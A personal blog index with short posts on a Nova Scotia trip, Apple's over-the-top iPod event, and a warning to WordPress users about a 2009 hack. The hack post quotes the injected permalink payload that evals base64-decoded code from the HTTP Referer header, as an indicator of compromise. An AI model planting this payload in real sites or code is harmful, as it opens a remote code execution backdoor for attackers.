On the Bluenose II… and ducks

Irene and I are on day two of our vacation to Nova Scotia. So far, I am having a lot of fun. We’ve flown too far, eaten too much, and now I have wind burn. In my previous post I provided a link to our travel “map”: in theory, it is supposed to be updated in near real time, but for some reason it stopped updating yesterday. I forced it to update earlier this evening, but don’t have a lot of faith that it will keep working going forward.

Today I have uploaded my first batch of pictures…

Continue reading On the Bluenose II… and ducks

In case you want to follow our trip…

I installed a little “trip tracker” app on my BlackBerry before I left. It is called GPSed and, other than the fact that it seems to have a dickens of a time getting a GPS lock at times, it works pretty well. Note that the GPS lock problem is really an issue with the BlackBerry- however, the BB also has a cell tower location system that other apps use (e.g.: my weather app, BeWeather).

You can follow our trip here=> http://gpsed.com/track/2776748136093189273 . Since I upgraded to the “professional” version of GPSed, I will now be able to annotate the waypoints with photos from my phone. Yay! And note that the map is powered by Google Maps, which means you can zoom in like crazy.

Packing up…

I’m organizing my electronics, clothing, and sundries for our trip to Nova Scotia. The plane leaves at around 7:30 PM tomorrow, and we arrive in Halifax at about 6:30 am or some similar ungodly hour- I’m only vaguely aware of the actual itinerary.

The actual details of the travel are not that interesting to me at the moment. The important stuff, of course, is what to take and what to do when we get there.

Continue reading Packing up…

Apple really likes those adjectives…

I found this on Gizmodo today, and when I watched the video I couldn’t help laughing out loud…

It is really awesomely incredibly great and unbelievable!

The video is extracted from the most recent (September 9th) Apple event, which was focussed on what I can only describe as a completely boring list of iPod announcements. There was nothing released that was “gee-whiz” like the iPhone, just minor incremental updates to existing product lines. Yet as is evidenced by this video, the Apple team worked hard to make it seem like they were revolutionizing the entire world.

I have to wonder how carefully the Apple folks craft and coach these kinds of over-the-top exuberant love-fests. I can’t imagine that this happens “naturally” or by accident. And it explains why the comparatively subdued presentations given by other companies seem so dour and boring in comparison.

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…


Continue reading WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/